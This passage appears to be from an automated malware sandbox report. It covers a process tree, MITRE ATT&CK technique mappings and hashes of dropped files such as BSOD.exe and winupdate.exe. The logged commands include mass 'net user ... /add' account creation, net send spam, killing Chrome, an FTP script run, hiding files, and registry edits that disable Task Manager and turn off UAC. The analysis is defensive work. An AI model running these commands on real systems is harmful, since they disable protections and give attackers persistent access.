        PID:2148
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4628
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2332
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3860
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3364
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:5032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4836
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4700
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2832
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1760
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3300
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:956
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2428
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4972
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1584
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2980
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3352
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2136
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3924
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4944
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1300
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3200
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4228
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2400
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1708
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1640
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4440
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:228
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2612
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1404
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1152
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2356
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4812
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2244
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2584
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3404
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2928
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2840
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:344
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3388
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1568
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:440
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4708
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2856
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3376
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:180
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3900
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4464
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3580
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1688
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:5068
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3504
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4668
    - - C:\Windows\system32\net.exe
        
        net user 24346 10122 /add
        5⤵
        
        PID:428
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 24346 10122 /add
        6⤵
        
        PID:3896
    - - C:\Windows\system32\net.exe
        
        net user 1332 17462 /add
        5⤵
        
        PID:2076
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 1332 17462 /add
        6⤵
        
        PID:3112
    - - C:\Windows\system32\net.exe
        
        net user 18526 23757 /add
        5⤵
        
        PID:2664
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18526 23757 /add
        6⤵
        
        PID:3868
    - - C:\Windows\system32\net.exe
        
        net user 20352 28498 /add
        5⤵
        
        PID:4004
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 20352 28498 /add
        6⤵
        
        PID:1084
    - - C:\Windows\system32\net.exe
        
        net user 20552 13204 /add
        5⤵
        
        PID:2020
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 20552 13204 /add
        6⤵
        
        PID:4780
    - - C:\Windows\system32\net.exe
        
        net user 24790 22162 /add
        5⤵
        
        PID:4536
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 24790 22162 /add
        6⤵
        
        PID:4404
    - - C:\Windows\system32\net.exe
        
        net user 13314 31289 /add
        5⤵
        
        PID:3932
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 13314 31289 /add
        6⤵
        
        PID:3012
    - - C:\Windows\system32\net.exe
        
        net user 31926 25541 /add
        5⤵
        
        PID:4248
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 31926 25541 /add
        6⤵
        
        PID:3500
    - - C:\Windows\system32\net.exe
        
        net user 22832 22166 /add
        5⤵
        
        PID:1368
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22832 22166 /add
        6⤵
        
        PID:876
    - - C:\Windows\system32\net.exe
        
        net user 27939 17969 /add
        5⤵
        
        PID:3028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 27939 17969 /add
        6⤵
        
        PID:4204
    - - C:\Windows\system32\net.exe
        
        net user 18960 8647 /add
        5⤵
        
        PID:1016
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18960 8647 /add
        6⤵
        
        PID:4208
    - - C:\Windows\system32\net.exe
        
        net user 32599 19579 /add
        5⤵
        
        PID:5032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32599 19579 /add
        6⤵
        
        PID:1372
    - - C:\Windows\system32\net.exe
        
        net user 14278 12594 /add
        5⤵
        
        PID:4700
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 14278 12594 /add
        6⤵
        
        PID:1760
    - - C:\Windows\system32\net.exe
        
        net user 14517 5575 /add
        5⤵
        
        PID:2056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 14517 5575 /add
        6⤵
        
        PID:4072
    - - C:\Windows\system32\net.exe
        
        net user 30449 12485 /add
        5⤵
        
        PID:3300
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 30449 12485 /add
        6⤵
        
        PID:2360
    - - C:\Windows\system32\net.exe
        
        net user 22527 24095 /add
        5⤵
        
        PID:804
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22527 24095 /add
        6⤵
        
        PID:1420
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
        5⤵
        
        PID:1436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
    - - C:\Windows\system32\tskill.exe
        
        tskill chrome.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1976
    - - C:\Windows\system32\ftp.exe
        
        ftp -s:a.dat
        5⤵
        
        PID:3956
    - - C:\Windows\system32\attrib.exe
        
        attrib C:\Windows\*.html +h -s
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3676
    - - C:\Windows\system32\attrib.exe
        
        attrib C:\Windows\*.txt +h +s
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:960
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
        5⤵
        
        PID:1636
    - - C:\Windows\system32\cmd.exe
        
        Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
        5⤵
        
        PID:4688
      - C:\Windows\system32\reg.exe
        
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
        6⤵
        UAC bypass
        
        PID:3376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8146.tmp\8147.tmp\8148.bat

Filesize
81B

MD5
8ca30ba528805426c983f6206ab8c395

SHA1
12509dfdd2867edc1050cb70c20e543d80a669bc

SHA256
6f1fd6e8d535a1556d9bad543944949d6451ed9bb61e84672997eff8594ee0d9

SHA512
0263b9a32e28365b307c992ad01fece74a41a37c426de8364cfb5d0b8f641d1a16f5f387066b07aa49b6b07d4838f54625c992ff7da535b86473ee29762a1c48

Download Submit
C:\Users\Admin\AppData\Local\Temp\831A.tmp\831B.tmp\831C.bat

Filesize
8KB

MD5
abbe7e67c87fbcfe4398b5dcd0a23df9

SHA1
afb6c5763820fd8b0d98550fa187b69916aaea83

SHA256
9865896bcf00f571ae9a29bf9495485e6b10de2552cfffec9067a45010b7034f

SHA512
bb461a272beed410cee00e7b5d65aa389ee0cca3a3677b42ed4df5d0155e5d59ad53200b0f99110b02dff98ea470ee67049158a612c8cb4fab9cd7e7e56fbb55

Download Submit
C:\Users\Admin\AppData\Local\Temp\BSOD.exe

Filesize
248KB

MD5
0a12d39a6db0252a14e19367d6ce795f

SHA1
2bf8ce4a222a2ec7a8ee66fe5625ff9e0af5653e

SHA256
26b034813e21eb05a202c5b795f5064f90b68d1470997c4ee12668a15cdea65c

SHA512
e7d30b951249b98a376e33e6b60136266fb6fe0110620abeae5d89a4813aaff86833ce105dfa939548c8fcbee9d62ab9384d606aceda0c2e73bae636f1d4eefd

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BluescreenSimulator.exe

Filesize
436KB

MD5
647af7197c5b9aa9d309ea47233d3134

SHA1
6d74bead5bc149ee03960c1fefe6a05779e8064c

SHA256
3a0f137e7b29fb6ec6636104d95588d4155cb188734299b61a87120fadeb6c9b

SHA512
a974c24c624f28a3e84f9189a069a0d89d412fbfde4e68f7494bf7c9ee1b610c21182a854a16f9fefed17be3488c6743083afd57e9c3fe790deaf7cee8aef09d

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\command

Filesize
316B

MD5
bc3e4eabb6aef0e352fe31cfbf64d007

SHA1
86add7dbd7a40b430034a6a5656bef42012249a1

SHA256
d29b5024eb5f50145ca8a9b11571546650d56cb220d39f5497af06867f3a8bfa

SHA512
b6ee4c8961535d451f34f93569c3eb1492918e2a4ce9184c5405a93bc99a23596e5515c975535c863843c8613a6fe9045fcd4abeef7d846b812fa48a89727009

Download Submit
C:\Users\Admin\AppData\Local\Temp\Web Data

Filesize
114KB

MD5
2324ec37813be6a3d1c95e51b92dbefd

SHA1
7ffff78670f5048aeff33622ce292b1037b288c1

SHA256
cb3253e7e25bee8f0b5cb3925e53acd898f0c12fc7127c1297c9567bbe139936

SHA512
cd05e51ea18dd8c20110f1e6021b361816361f0e2c5a9ea25694b4c7db079279fbb6f0a8ffb5517647df4f94c62414633cae6bc94c7a6db1032246d67f9ec1ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\msgbox.vbs

Filesize
40B

MD5
39b1ca43fe9b8ee5d3024a4d36920f66

SHA1
014de4f9c82e91a53ccbbe4fcf8bd6290684ab7c

SHA256
d9142020970b5dc0f3f8ff6415c63c94789c446b7051b5ec2e1d2348094266f0

SHA512
8dc29e1f25364c2363a4a18331861bed11a13140861406f83965d5ababd00ef3fcb4d80600966096729b47f2fc48e31d7f8cdee967ae0f63fd77664bbe01e99f

Download Submit
C:\Users\Admin\AppData\Local\Temp\winupdate.exe

Filesize
119KB

MD5
4c0ed3f57127bcf6b0e5614008af1025

SHA1
e5f3a45bcfa0a83e23546648ed61a6ddf5f36d69

SHA256
651fb37dc512099087caf9ed09a8fbea601534ced66c50b77cb13476b2f3086a

SHA512
5deddb5b8d92ecb010f8b11507f0fb9b09a4b6b5ef9364d6b96d9e25d6e4aed0a49f1ba4a4ccda5a280e42280d05af821c922efdc139a7eafd180d779ee3c61e

Download Submit
C:\mail.vbs

Filesize
592B

MD5
73f24bfe0ad21dcdb3e12f1dc127c707

SHA1
d7970bed3abf6f50e4b327fa4759731524e85d49

SHA256
b101aa614ad948b193c025ceff98c8716c6f3ebb1524b7b86e308af4840a25cb

SHA512
d1c60284b261b32c7322791df5c13b110efacc7831d60ce24d9120cbf47fa7d247ab3071e3214ce0256a040634bee953b32e939215e0c58bbf0e19814891f1d1

Download Submit
memory/2552-20-0x0000025211740000-0x00000252117B2000-memory.dmp

Filesize
456KB

Download
memory/4744-30-0x000001EA5C860000-0x000001EA5C898000-memory.dmp

Filesize
224KB

Download
memory/4744-31-0x000001EA58EB0000-0x000001EA58EBE000-memory.dmp

Filesize
56KB

Download